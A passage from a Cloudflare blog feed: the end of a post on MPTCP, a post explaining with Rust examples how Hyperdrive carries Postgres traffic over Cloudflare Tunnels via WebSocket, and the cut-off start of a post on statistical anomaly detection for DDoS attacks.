    <p>I find MPTCP very exciting, as it's one of the few serious TCP extensions that has actually been deployed. However, current implementations are limited. My experimentation showed that the only practical scenario where MPTCP is currently useful is:</p><ul><li><p>Linux as a server</p></li><li><p>macOS/iOS as a client</p></li><li><p>"interactive" use case</p></li></ul><p>With a bit of effort, Linux can be made to work as a client.</p><p>Don't get me wrong, <a href="https://netdevconf.info/0x14/pub/slides/59/mptcp-netdev0x14-final.pdf"><u>Linux developers did tremendous work</u></a> to get where we are, but, in my opinion, for any serious out-of-the-box use case, we're not there yet. I'm optimistic that Linux can develop a good MPTCP client story relatively soon, and the possibility of implementing the Path manager and Scheduler in BPF is really enticing. </p><p>Time will tell if MPTCP succeeds — it's been 15 years in the making. In the meantime, <a href="https://datatracker.ietf.org/meeting/121/materials/slides-121-quic-multipath-quic-00"><u>Multi-Path QUIC</u></a> is under active development, but it's even further from being usable at this stage.</p><p>We're not quite sure if it makes sense for Cloudflare to support MPTCP. <a href="https://community.cloudflare.com/c/feedback/feature-request/30"><u>Reach out</u></a> if you have a use case in mind!</p><p><i>Shoutout to </i><a href="https://fosstodon.org/@matttbe"><i><u>Matthieu Baerts</u></i></a><i> for tremendous help with this blog post.</i></p> ]]></content:encoded>
            <category><![CDATA[TCP]]></category>
            <category><![CDATA[Network]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">6ZxrGIedGqREgTs02vpt0t</guid>
            <dc:creator>Marek Majkowski</dc:creator>
        </item>
        <item>
            <title><![CDATA[Elephants in tunnels: how Hyperdrive connects to databases inside your VPC networks]]></title>
            <link>https://blog.cloudflare.com/elephants-in-tunnels-how-hyperdrive-connects-to-databases-inside-your-vpc-networks/</link>
            <pubDate>Fri, 25 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Hyperdrive (Cloudflare’s globally distributed SQL connection pooler and cache) recently added support for directing database traffic from Workers across Cloudflare Tunnels. ]]></description>
            <content:encoded><![CDATA[ <p>With September’s <a href="https://blog.cloudflare.com/builder-day-2024-announcements/#connect-to-private-databases-from-workers"><u>announcement</u></a> of Hyperdrive’s ability to send database traffic from <a href="https://workers.cloudflare.com/"><u>Workers</u></a> over <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/"><u>Cloudflare Tunnels</u></a>, we wanted to dive into the details of what it took to make this happen.</p>
    <div>
      <h2>Hyper-who?</h2>
      <a href="#hyper-who">
        
      </a>
    </div>
    <p>Accessing your data from anywhere in Region Earth can be hard. Traditional databases are powerful, familiar, and feature-rich, but your users can be thousands of miles away from your database. This can cause slower connection startup times, slower queries, and connection exhaustion as everything takes longer to accomplish.</p><p><a href="https://developers.cloudflare.com/workers/"><u>Cloudflare Workers</u></a> is an incredibly lightweight runtime, which enables our customers to deploy their applications globally by default and renders the <a href="https://en.wikipedia.org/wiki/Cold_start_(computing)"><u>cold start</u></a> problem almost irrelevant. The trade-off for these light, ephemeral execution contexts is the lack of persistence for things like database connections. Database connections are also notoriously expensive to spin up, with many round trips required between client and server before any query or result bytes can be exchanged.</p><p><a href="https://blog.cloudflare.com/hyperdrive-making-regional-databases-feel-distributed"><u>Hyperdrive</u></a> is designed to make the centralized databases you already have feel like they’re global while keeping connections to those databases hot. We use our <a href="https://www.cloudflare.com/network/"><u>global network</u></a> to get faster routes to your database, keep connection pools primed, and cache your most frequently run queries as close to users as possible.</p>
    <div>
      <h2>Why a Tunnel?</h2>
      <a href="#why-a-tunnel">
        
      </a>
    </div>
    <p>For something as sensitive as your database, exposing access to the public Internet can be uncomfortable. It is common to instead host your database on a private network, and allowlist known-safe IP addresses or configure <a href="https://www.cloudflare.com/learning/network-layer/what-is-gre-tunneling/"><u>GRE tunnels</u></a> to permit traffic to it. This is complex, toilsome, and error-prone. </p><p>On Cloudflare’s <a href="https://www.cloudflare.com/en-gb/developer-platform/"><u>Developer Platform</u></a>, we strive for simplicity and ease-of-use. We cannot expect all of our customers to be experts in configuring networking solutions, and so we went in search of a simpler solution. <a href="https://www.cloudflare.com/the-net/top-of-mind-security/customer-zero/"><u>Being your own customer</u></a> is rarely a bad choice, and it so happens that Cloudflare offers an excellent option for this scenario: Tunnels.</p><p><a href="https://www.cloudflare.com/products/tunnel/"><u>Cloudflare Tunnel</u></a> is a Zero Trust product that creates a secure connection between your private network and Cloudflare. Exposing services within your private network can be as simple as <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/downloads/"><u>running a </u><code><u>cloudflared</u></code><u> binary</u></a>, or deploying a Docker container running the <a href="https://hub.docker.com/r/cloudflare/cloudflared"><code><u>cloudflared</u></code><u> image we distribute</u></a>. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3182f43rbwdH9krF1xhdlC/d22430cdb1efa134031f94fea691c36e/image1.png" />
          </figure>
    <div>
      <h2>A custom handler and generic streams</h2>
      <a href="#a-custom-handler-and-generic-streams">
        
      </a>
    </div>
    <p>Integrating with Tunnels to support sending Postgres directly through them was a bit of a new challenge for us. Most of the time, when we use Tunnels internally (more on that later!), we rely on the excellent job <code>cloudflared</code> does of handling all of the mechanics, and we just treat them as pipes. That wouldn’t work for Hyperdrive, though, so we had to dig into how Tunnels actually ingress traffic to build a solution.</p><p>Hyperdrive handles Postgres traffic using an entirely custom implementation of the <a href="https://www.postgresql.org/docs/current/protocol.html"><u>Postgres message protocol</u></a>. This is necessary, because we sometimes have to <a href="https://blog.cloudflare.com/postgres-named-prepared-statements-supported-hyperdrive"><u>alter the specific type or content</u></a> of messages sent from client to server, or vice versa. Handling individual bytes gives us the flexibility to implement whatever logic any new feature might need.</p><p>An additional, perhaps less obvious, benefit of handling Postgres message traffic as just bytes is that we are not bound to the transport layer choices of some <a href="https://en.wikipedia.org/wiki/Object%E2%80%93relational_mapping"><u>ORM</u></a> or library. One of the nuances of running services in Cloudflare is that we may want to egress traffic over different services or protocols, for a variety of different reasons. In this case, being able to egress traffic via a Tunnel would be pretty challenging if we were stuck with whatever raw TCP socket a library had established for us.</p><p>The way we accomplish this relies on a mainstay of Rust: <a href="https://doc.rust-lang.org/book/ch10-02-traits.html"><u>traits</u></a> (which are how Rust lets developers apply logic across generic functions and types). 
In the Rust ecosystem, there are two traits that define the behavior Hyperdrive wants out of its transport layers: <a href="https://docs.rs/tokio/latest/tokio/io/trait.AsyncRead.html"><code><u>AsyncRead</u></code></a> and <a href="https://docs.rs/tokio/latest/tokio/io/trait.AsyncWrite.html"><code><u>AsyncWrite</u></code></a>. There are a couple of others we also need, but we’re going to focus on just these two. These traits enable us to code our entire custom handler against a generic stream of data, without the handler needing to know anything about the underlying protocol used to implement the stream. So, we can pass around a WebSocket connection as a generic I/O stream, wherever it might be needed.</p><p>As an example, the code to create a generic TCP stream and send a Postgres startup message across it might look like this:</p>
            <pre><code>/// Send a startup message to a Postgres server, in the role of a PG client.
/// https://www.postgresql.org/docs/current/protocol-message-formats.html#PROTOCOL-MESSAGE-FORMATS-STARTUPMESSAGE
pub async fn send_startup&lt;S&gt;(stream: &amp;mut S, user_name: &amp;str, db_name: &amp;str, app_name: &amp;str) -&gt; Result&lt;(), ConnectionError&gt;
where
    S: AsyncWrite + Unpin,
{
    let protocol_number: i32 = 196608; // protocol version 3.0, i.e. 3 &lt;&lt; 16
    let user_str = &amp;b"user\0"[..];
    let user_bytes = user_name.as_bytes();
    let db_str = &amp;b"database\0"[..];
    let db_bytes = db_name.as_bytes();
    let app_str = &amp;b"application_name\0"[..];
    let app_bytes = app_name.as_bytes();
    let len = 4 + 4
        + user_str.len() + user_bytes.len() + 1
        + db_str.len() + db_bytes.len() + 1
        + app_str.len() + app_bytes.len() + 1 + 1;

    // Construct a BytesMut of our startup message, then send it
    let mut startup_message = BytesMut::with_capacity(len as usize);
    startup_message.put_i32(len as i32);
    startup_message.put_i32(protocol_number);
    startup_message.put(user_str);
    startup_message.put_slice(user_bytes);
    startup_message.put_u8(0);
    startup_message.put(db_str);
    startup_message.put_slice(db_bytes);
    startup_message.put_u8(0);
    startup_message.put(app_str);
    startup_message.put_slice(app_bytes);
    startup_message.put_u8(0);
    startup_message.put_u8(0);

    match stream.write_all(&amp;startup_message).await {
        Ok(_) =&gt; Ok(()),
        Err(err) =&gt; {
            error!("Error writing startup to server: {}", err.to_string());
            Err(ConnectionError::InternalError)
        }
    }
}

// Connect to a TCP socket; the binding must be mutable so we can write to it
let mut stream = match TcpStream::connect(("localhost", 5432)).await {
    Ok(s) =&gt; s,
    Err(err) =&gt; {
        error!("Error connecting to address: {}", err.to_string());
        return ConnectionError::InternalError;
    }
};
let _ = send_startup(&amp;mut stream, "db_user", "my_db", "my_app").await;</code></pre>
            <p>With this approach, if we wanted to encrypt the stream using <a href="https://www.cloudflare.com/learning/ssl/transport-layer-security-tls/#:~:text=Transport%20Layer%20Security%2C%20or%20TLS,web%20browsers%20loading%20a%20website."><u>TLS</u></a> before we write to it (upgrading our existing <code>TcpStream</code> connection in-place, to an <code>SslStream</code>), we would only have to change the code we use to create the stream, while generating and sending the traffic would remain unchanged. This is because <code>SslStream</code> also implements <code>AsyncWrite</code>!</p>
            <pre><code>// We're handwaving the SSL setup here. You're welcome.
let conn_config = new_tls_client_config()?;

// Encrypt the TcpStream, returning an SslStream
let mut ssl_stream = match tokio_boring::connect(conn_config, domain, stream).await {
    Ok(s) =&gt; s,
    Err(err) =&gt; {
        error!("Error during TLS handshake: {}", err.to_string());
        return ConnectionError::InternalError;
    }
};
let _ = send_startup(&amp;mut ssl_stream, "db_user", "my_db", "my_app").await;</code></pre>
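<p>As a cross-check of the length arithmetic in <code>send_startup</code>, the same bytes can be produced in a few lines of Python. This is a hypothetical sketch of the standard PostgreSQL v3 StartupMessage layout (self-inclusive Int32 length, Int32 protocol 196608, NUL-terminated key/value pairs, trailing NUL), not code from Hyperdrive:</p>

```python
import struct

def startup_message(user, database, application_name):
    """Encode a PostgreSQL v3 StartupMessage."""
    params = b""
    for key, value in (
        (b"user", user.encode()),
        (b"database", database.encode()),
        (b"application_name", application_name.encode()),
    ):
        params += key + b"\x00" + value + b"\x00"
    body = struct.pack("!i", 196608) + params + b"\x00"  # 196608 == 3 << 16
    return struct.pack("!i", 4 + len(body)) + body       # length includes itself

msg = startup_message("db_user", "my_db", "my_app")
assert struct.unpack("!i", msg[:4])[0] == len(msg)
```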
            
    <div>
      <h2>Whence WebSocket</h2>
      <a href="#whence-websocket">
        
      </a>
    </div>
    <p><a href="https://datatracker.ietf.org/doc/html/rfc6455"><u>WebSocket</u></a> is an application layer protocol that enables bidirectional communication between a client and server. Typically, to establish a WebSocket connection, a client initiates an HTTP request and indicates they wish to upgrade the connection to WebSocket via the “Upgrade” header. Then, once the client and server complete the handshake, both parties can send messages over the connection until one of them terminates it.</p><p>Now, it turns out that the way Cloudflare Tunnels work under the hood is that both ends of the tunnel want to speak WebSocket, and rely on a translation layer to convert all traffic to or from WebSocket. The <code>cloudflared</code> daemon you spin up within your private network handles this for us! For Hyperdrive, however, we did not have a suitable translation layer to send Postgres messages across WebSocket, and had to write one.</p><p>One of the (many) fantastic things about Rust traits is that the contract they present is very clear. To be <code>AsyncRead</code>, you just need to implement <code>poll_read</code>. To be <code>AsyncWrite</code>, you need to implement only three functions (<code>poll_write</code>, <code>poll_flush</code>, and <code>poll_shutdown</code>). Further, there is excellent support for WebSocket in Rust built on top of the <a href="https://github.com/snapview/tungstenite-rs"><u>tungstenite-rs library</u></a>.</p><p>Thus, building our custom WebSocket stream such that it can share the same machinery as all our other generic streams just means translating the existing WebSocket support into these poll functions. There are some existing OSS projects that do this, but for multiple reasons we could not use the existing options. 
The primary reason is that Hyperdrive operates across multiple threads (thanks to the <a href="https://docs.rs/tokio/latest/tokio/runtime/index.html"><u>tokio runtime</u></a>), and so we rely on our connections to also handle <a href="https://doc.rust-lang.org/std/marker/trait.Send.html"><code><u>Send</u></code></a>, <a href="https://doc.rust-lang.org/std/marker/trait.Sync.html"><code><u>Sync</u></code></a>, and <a href="https://doc.rust-lang.org/std/marker/trait.Unpin.html"><code><u>Unpin</u></code></a>. None of the available solutions had all five traits handled. It turns out that most of them went with the paradigm of <a href="https://docs.rs/futures/latest/futures/sink/trait.Sink.html"><code><u>Sink</u></code></a> and <a href="https://docs.rs/futures/latest/futures/stream/trait.Stream.html"><code><u>Stream</u></code></a>, which provide a solid base from which to translate to <code>AsyncRead</code> and <code>AsyncWrite</code>. In fact some of the functions overlap, and can be passed through almost unchanged. For example, <code>poll_flush</code> and <code>poll_shutdown</code> have 1-to-1 analogs, and require almost no engineering effort to convert from <code>Sink</code> to <code>AsyncWrite</code>.</p>
            <pre><code>/// We use this struct to implement the traits we need on top of a WebSocketStream
pub struct HyperSocket&lt;S&gt;
where
    S: AsyncRead + AsyncWrite + Send + Sync + Unpin,
{
    inner: WebSocketStream&lt;S&gt;,
    read_state: Option&lt;ReadState&gt;,
    write_err: Option&lt;Error&gt;,
}

impl&lt;S&gt; AsyncWrite for HyperSocket&lt;S&gt;
where
    S: AsyncRead + AsyncWrite + Send + Sync + Unpin,
{
    // poll_write is omitted here for brevity; it bridges the Sink side
    // (poll_ready + start_send) into AsyncWrite's poll_write.
    fn poll_flush(mut self: Pin&lt;&amp;mut Self&gt;, cx: &amp;mut Context&lt;'_&gt;) -&gt; Poll&lt;io::Result&lt;()&gt;&gt; {
        match ready!(Pin::new(&amp;mut self.inner).poll_flush(cx)) {
            Ok(_) =&gt; Poll::Ready(Ok(())),
            Err(err) =&gt; Poll::Ready(Err(Error::new(ErrorKind::Other, err))),
        }
    }

    fn poll_shutdown(mut self: Pin&lt;&amp;mut Self&gt;, cx: &amp;mut Context&lt;'_&gt;) -&gt; Poll&lt;io::Result&lt;()&gt;&gt; {
        match ready!(Pin::new(&amp;mut self.inner).poll_close(cx)) {
            Ok(_) =&gt; Poll::Ready(Ok(())),
            Err(err) =&gt; Poll::Ready(Err(Error::new(ErrorKind::Other, err))),
        }
    }
}
</code></pre>
            <p>With that translation done, we can use an existing WebSocket library to upgrade our <code>SslStream</code> connection to a Cloudflare Tunnel, and wrap the result in our <code>AsyncRead/AsyncWrite</code> implementation. The result can then be used anywhere that our other transport streams would work, without any changes needed to the rest of our codebase! </p><p>That would look something like this:</p>
            <pre><code>let websocket = match tokio_tungstenite::client_async(request, ssl_stream).await {
    // client_async yields the stream plus the server's HTTP response
    Ok((ws, _response)) =&gt; ws,
    Err(err) =&gt; {
        error!("Error during websocket conn setup: {}", err.to_string());
        return ConnectionError::InternalError;
    }
};
let mut websocket_stream = HyperSocket::new(websocket);
let _ = send_startup(&amp;mut websocket_stream, "db_user", "my_db", "my_app").await;</code></pre>
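<p>For the curious, the upgrade that <code>client_async</code> performs for us ends with the server proving it understood the handshake: it echoes the Base64 of the SHA-1 of the client's <code>Sec-WebSocket-Key</code> concatenated with a GUID fixed by RFC 6455. A small Python sketch (not Hyperdrive code) of that computation:</p>

```python
import base64
import hashlib

# Magic GUID fixed by RFC 6455 for the Sec-WebSocket-Accept computation.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

def websocket_accept(sec_websocket_key: str) -> str:
    """Value the server must return in the Sec-WebSocket-Accept header."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")

# Worked example from RFC 6455, section 1.3:
print(websocket_accept("dGhlIHNhbXBsZSBub25jZQ=="))  # s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
```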
            
    <div>
      <h2>Access granted</h2>
      <a href="#access-granted">
        
      </a>
    </div>
    <p>An observant reader might have noticed that in the code example above we snuck in a variable named <code>request</code> that we passed in when upgrading from an <code>SslStream</code> to a <code>WebSocketStream</code>. This is for multiple reasons. The first reason is that Tunnels are assigned a hostname and use this hostname for routing. The second and more interesting reason is that (as mentioned above) when negotiating an upgrade from HTTP to WebSocket, a request must be sent to the server hosting the ingress side of the Tunnel to <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Protocol_upgrade_mechanism"><u>perform the upgrade</u></a>. This is pretty universal, but we also add in an extra piece here.</p><p>At Cloudflare, we believe that <a href="https://blog.cloudflare.com/secure-by-default-understanding-new-cisa-guide/"><u>secure defaults</u></a> and <a href="https://www.cloudflare.com/learning/security/glossary/what-is-defense-in-depth/"><u>defense in depth</u></a> are the correct ways to build a better Internet. This is why traffic across Tunnels is encrypted, for example. However, that does not necessarily prevent unwanted traffic from being sent into your Tunnel, and therefore egressing out to your database. While Postgres offers a robust set of <a href="https://www.postgresql.org/docs/current/user-manag.html"><u>access control</u></a> options for protecting your database, wouldn’t it be best if unwanted traffic never got into your private network in the first place? </p><p>To that end, all <a href="https://developers.cloudflare.com/hyperdrive/configuration/connect-to-private-database/"><u>Tunnels set up for use with Hyperdrive</u></a> should have a <a href="https://developers.cloudflare.com/cloudflare-one/applications/"><u>Zero Trust Access Application</u></a> configured to protect them. These applications should use a <a href="https://developers.cloudflare.com/cloudflare-one/identity/service-tokens/"><u>Service Token</u></a> to authorize connections. 
When setting up a new Hyperdrive, you have the option to provide the token’s ID and Secret, which will be encrypted and stored alongside the rest of your configuration. These will be presented as part of the WebSocket upgrade request to authorize the connection, allowing your database traffic through while preventing unwanted access.</p><p>This can be done within the request’s headers, and might look something like this:</p>
            <pre><code>let ws_url = format!("wss://{}", host);
let mut request = match ws_url.into_client_request() {
    Ok(req) =&gt; req,
    Err(err) =&gt; {
        error!(
            "Hostname {} could not be parsed into a valid request URL: {}", 
            host,
            err.to_string()
        );
        return ConnectionError::InternalError;
    }
};
request.headers_mut().insert(
    "CF-Access-Client-Id",
    http::header::HeaderValue::from_str(&amp;client_id).unwrap(),
);
request.headers_mut().insert(
    "CF-Access-Client-Secret",
    http::header::HeaderValue::from_str(&amp;client_secret).unwrap(),
);
</code></pre>
            
    <div>
      <h2>Building for customer zero</h2>
      <a href="#building-for-customer-zero">
        
      </a>
    </div>
    <p>If you’ve been reading the blog for a long time, some of this might sound a bit familiar.  This isn’t the first time that we’ve <a href="https://blog.cloudflare.com/cloudflare-tunnel-for-postgres/"><u>sent Postgres traffic across a tunnel</u></a>, it’s something most of us do from our laptops regularly.  This works very well for interactive use cases with low traffic volume and a high tolerance for latency, but historically most of our products have not been able to employ the same approach.</p><p>Cloudflare operates <a href="https://www.cloudflare.com/network/"><u>many data centers</u></a> around the world, and most services run in every one of those data centers. There are some tasks, however, that make the most sense to run in a more centralized fashion. These include tasks such as managing control plane operations, or storing configuration state.  Nearly every Cloudflare product houses its control plane information in <a href="https://blog.cloudflare.com/performance-isolation-in-a-multi-tenant-database-environment/"><u>Postgres clusters</u></a> run centrally in a handful of our data centers, and we use a variety of approaches for accessing that centralized data from elsewhere in our network. For example, many services currently use a push-based model to publish updates to <a href="https://blog.cloudflare.com/moving-quicksilver-into-production/"><u>Quicksilver</u></a>, and work through the complexities implied by such a model. This has been a recurring challenge for any team looking to build a new product.</p><p>Hyperdrive’s entire reason for being is to make it easy to access such central databases from our global network. When we began exploring Tunnel integrations as a feature, many internal teams spoke up immediately and strongly suggested they’d be interested in using it themselves. This was an excellent opportunity for Cloudflare to scratch its own itch, while also getting a lot of traffic on a new feature before releasing it directly to the public. 
As always, being “customer zero” means that we get fast feedback, more reliability over time, stronger connections between teams, and an overall better suite of products. We jumped at the chance.</p><p>As we rolled out early versions of Tunnel integration, we worked closely with internal teams to get them access to it, and fixed any rough spots they encountered. We’re pleased to share that this first batch of teams have found great success building new or <a href="https://www.cloudflare.com/learning/cloud/how-to-refactor-applications/">refactored</a> products on Hyperdrive over Tunnels. For example: if you’ve already tried out <a href="https://blog.cloudflare.com/builder-day-2024-announcements/#continuous-integration-and-delivery"><u>Workers Builds</u></a>, or recently <a href="https://www.cloudflare.com/trust-hub/reporting-abuse/"><u>submitted an abuse report</u></a>, you’re among our first users!  At the time of this writing, we have several more internal teams working to onboard, and we on the Hyperdrive team are very excited to see all the different ways in which fast and simple connections from Workers to a centralized database can help Cloudflare just as much as they’ve been helping our external customers.</p>
    <div>
      <h2>Outro</h2>
      <a href="#outro">
        
      </a>
    </div>
    <p>Cloudflare is on a mission to make the Internet faster, safer, and more reliable. Hyperdrive was built to make connecting to centralized databases from the Workers runtime as quick and consistent as possible, and this latest development is designed to help all those who want to use Hyperdrive without directly exposing resources within their virtual private clouds (VPCs) on the public web.</p><p>To this end, we chose to build a solution around our suite of industry-leading <a href="https://developers.cloudflare.com/cloudflare-one/"><u>Zero Trust</u></a> tools, and were delighted to find how simple it was to implement in our runtime given the power and extensibility of the Rust <code>trait</code> system. </p><p>Without waiting for the ink to dry, multiple teams within Cloudflare have adopted this new feature to quickly and easily solve what have historically been complex challenges, and are happily operating it in production today.</p><p>And now, if you haven't already, try <a href="https://developers.cloudflare.com/hyperdrive/configuration/connect-to-private-database/"><u>setting up Hyperdrive across a Tunnel</u></a>, and let us know what you think in the <a href="https://discord.com/channels/595317990191398933/1150557986239021106"><u>Hyperdrive Discord channel</u></a>!</p> ]]></content:encoded>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Hyperdrive]]></category>
            <category><![CDATA[Postgres]]></category>
            <category><![CDATA[SQL]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[WebSockets]]></category>
            <guid isPermaLink="false">5GK429XQHhFzVyKSXGZ2R6</guid>
            <dc:creator>Andrew Repp</dc:creator>
            <dc:creator>Emilio Assunção</dc:creator>
            <dc:creator>Abhishek Chanda</dc:creator>
        </item>
        <item>
            <title><![CDATA[Training a million models per day to save customers of all sizes from DDoS attacks]]></title>
            <link>https://blog.cloudflare.com/training-a-million-models-per-day-to-save-customers-of-all-sizes-from-ddos/</link>
            <pubDate>Wed, 23 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ In this post we will describe how we use anomaly detection to watch for novel DDoS attacks. We’ll provide an overview of how we build models which flag unusual traffic and keep our customers safe. ]]></description>
            <content:encoded><![CDATA[ <p>Our always-on DDoS protection runs inside every server across our global network. It constantly analyzes incoming traffic, looking for signals associated with previously identified DDoS attacks. We dynamically create <a href="https://developers.cloudflare.com/ddos-protection/about/how-ddos-protection-works/"><u>fingerprints</u></a> to flag malicious traffic, which is dropped when detected in high enough volume — so it never reaches its destination — keeping customer websites online.</p><p>In many cases, flagging bad traffic can be straightforward. For example, if we see too many requests to a destination with the same protocol violation, we can be fairly sure this is an automated script, rather than a surge of requests from a legitimate web browser.</p><p>Our DDoS systems are great at detecting attacks, but there’s a minor catch. Much like the human immune system, they are great at spotting attacks similar to things they have seen before. But for new and novel threats, they need a little help knowing what to look for, which is an expensive and time-consuming human endeavor.</p><p>Cloudflare protects millions of Internet properties, and we serve over 60 million HTTP requests per second on average, so trying to find unmitigated attacks in such a huge volume of traffic is a daunting task. In order to protect the smallest of companies, we need a way to find unmitigated attacks that may only be a few thousand requests per second, as even these can be enough to take smaller sites offline.</p><p>To better protect our customers, we also have a system to automatically identify unmitigated or partially mitigated DDoS attacks, so we can better shore up our defenses against emerging threats. In this post we will introduce this anomaly detection pipeline and provide an overview of how it builds statistical models which flag unusual traffic and keep our customers safe. Let’s jump in!</p>
    <div>
      <h2>A naive volumetric model</h2>
      <a href="#a-naive-volumetric-model">
        
      </a>
    </div>
    <p>A DDoS attack, by definition, is characterized by a higher than normal volume of traffic destined for a particular destination. We can use this fact to loosely sketch out a potential approach. Let’s look at an example website, and look at the request volume over the course of a day, broken down into 1 minute intervals.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6j97IMawigCOtQEIKLzQ4n/8ab1e487a5dc8faaecc732b8fbb7d8d4/image3.png" />
          </figure><p>We can plot this same data as a histogram:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Ys3wf2GY6e5K4rEBUTDBN/5cff86a1f90ee5e0eae9ec394f2322b3/image6.png" />
          </figure><p>The data follows a bell-shaped curve, also known as a normal distribution. We can use this fact to flag observations which appear outside the usual range. By first calculating the mean and standard deviation of our dataset, we can then use these values to rate new observations by calculating how many standard deviations (or sigma) the data is from the mean.</p><p>This value is also called the z-score — a z-score of 3 is the same as 3-sigma, which corresponds to 3 standard deviations from the mean. A data point with a high enough z-score is sufficiently unusual that it might signal an attack. Since the mean and standard deviation are stationary, we can calculate a request volume threshold for each z-score value, and use traffic volumes above these thresholds to signal an ongoing attack.</p>
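<p>As a concrete sketch of the thresholding just described (toy code with illustrative names, not anything from our production pipeline), computing the mean, standard deviation, and per-sigma request-volume cutoffs looks like this:</p>

```rust
// Toy sketch: volume thresholds for a set of z-score cutoffs, assuming
// the per-interval request counts follow a normal distribution.
fn mean(xs: &[f64]) -> f64 {
    xs.iter().sum::<f64>() / xs.len() as f64
}

fn std_dev(xs: &[f64], mu: f64) -> f64 {
    // Population standard deviation.
    (xs.iter().map(|x| (x - mu).powi(2)).sum::<f64>() / xs.len() as f64).sqrt()
}

/// For each sigma value z, anything above `mu + z * sd` is flagged.
fn thresholds(xs: &[f64], sigmas: &[f64]) -> Vec<f64> {
    let mu = mean(xs);
    let sd = std_dev(xs, mu);
    sigmas.iter().map(|z| mu + z * sd).collect()
}
```

<p>An interval whose request count exceeds the chosen cutoff would be flagged as a potential attack. As we see next, this only holds up while traffic really is this uniform.</p>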
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4X5WaA5QssNRlWWaz4UUYL/05b88c9cfe52f6ba05cef7cab033d53d/image1.png" />
          </figure><p><sup><i>Trigger thresholds for z-score of 3, 4 and 5</i></sup></p><p>Unfortunately, it’s incredibly rare to see traffic that is this uniform in practice, as user load will naturally vary over a day. Here I’ve simulated some traffic for a website which runs a meal delivery service, and as you might expect it has big peaks around meal times, and low traffic overnight since it only operates in a single country.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Pk6sFmz8lqjUJrdTev8Xw/194436196eddbbb11576b74f1515d6c6/image2.png" />
          </figure><p>Our volume data no longer follows a normal distribution and our 3-sigma threshold is now much further away, so smaller attacks could pass undetected.</p><p>Many websites elastically scale their underlying hardware based upon anticipated load to save on costs. In the example above the website operator would run far fewer servers overnight, when the anticipated load is low, to save on running costs. This makes the website more vulnerable to attacks during off-peak hours as there would be less hardware to absorb them. An attack as low as a few hundred requests per minute may be enough to overwhelm the site early in the morning, even though the peak-time infrastructure could easily absorb this volume.</p><p>This approach relies on traffic volume being stable over time, meaning it’s roughly flat throughout the day, but this is rarely true in practice. Even when it is true, benign increases in traffic are common, such as an e-commerce site running a Black Friday sale. In this situation, a website would expect a surge in traffic that our model wouldn’t anticipate, and we may incorrectly flag real shoppers as attackers.</p><p>It turns out this approach makes too many naive assumptions about what traffic should look like, so it’s impossible to choose an appropriate sigma threshold which works well for all customers.</p>
    <div>
      <h2>Time series forecasting</h2>
      <a href="#time-series-forecasting">
        
      </a>
    </div>
    <p>Let’s continue with trying to determine a volumetric baseline for our meal delivery example. A reasonable assumption we could add is that yesterday’s traffic shape should approximate the expected shape of traffic today. This idea is called “seasonality”. Weekly seasonality is also pretty common, i.e. websites see more or less traffic on certain weekdays or on weekends.</p><p>There are many methods designed to analyze a dataset, unpick the varying horizons of seasonality within it, and then build an appropriate predictive model. We won’t go into them here, but reading about <a href="https://en.wikipedia.org/wiki/Autoregressive_integrated_moving_average"><u>Seasonal ARIMA (SARIMA)</u></a> is a good place to start if you are looking for further information.</p><p>There are three main challenges that make SARIMA methods unsuitable for our purposes. The first is that in order to get a good idea of seasonality, you need a lot of data. To predict weekly seasonality, you need at least a few weeks’ worth of data. We’d require a massive dataset to predict monthly, or even annual, patterns (such as Black Friday). This means new customers wouldn’t be protected until they’d been with us for multiple years, so this isn’t a particularly practical approach.</p><p>The second issue is the cost of training models. In order to maintain good accuracy, time series models need to be frequently retrained. The exact frequency varies between methods, but in the worst cases, a model is only good for 2–3 inferences, meaning we’d need to retrain all our models every 10–20 minutes. This is feasible, but it’s incredibly wasteful.</p><p>The third hurdle is the hardest to work around, and is the reason why a purely volumetric model doesn’t work. Most websites experience completely benign spikes in traffic that lie outside prior norms. Flash sales are one such example, or 1,000,000 visitors driven to a site from Reddit, or a Super Bowl commercial.</p>
    <div>
      <h2>A better way?</h2>
      <a href="#a-better-way">
        
      </a>
    </div>
    <p>So if volumetric modeling won’t work, what can we do instead? Fortunately, volume isn’t the only axis we can use to measure traffic. Consider the end users’ browsers for example. It would be reasonable to assume that over a given time interval, the proportion of users across the top 5 browsers would remain reasonably stationary, or at least within a predictable range. More importantly, this proportion is unlikely to change too much during benign traffic surges.</p><p>Through careful analysis we were able to discover about a dozen such variables with the following features for a given zone: </p><ul><li><p>They follow a normal distribution</p></li><li><p>They aren’t correlated, or are only loosely correlated with volume</p></li><li><p>They deviate from the underlying normal distribution during “under attack” events</p></li></ul><p>Recall our initial volume model, where we used z-score to define a cutoff. We can expand this same idea to multiple dimensions. We have a dozen different time series (each feature is a single time series), which we can imagine as a cloud of points in 12 dimensions. Here is a sample showing 3 such features, with each point representing the traffic readings at a different point in time. Note that both graphs show the same cloud of points from two different angles.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5idkNYYgL0IhY8d2HapYud/f3696ec7fb91f8641a04ba261d0cf673/image4.png" />
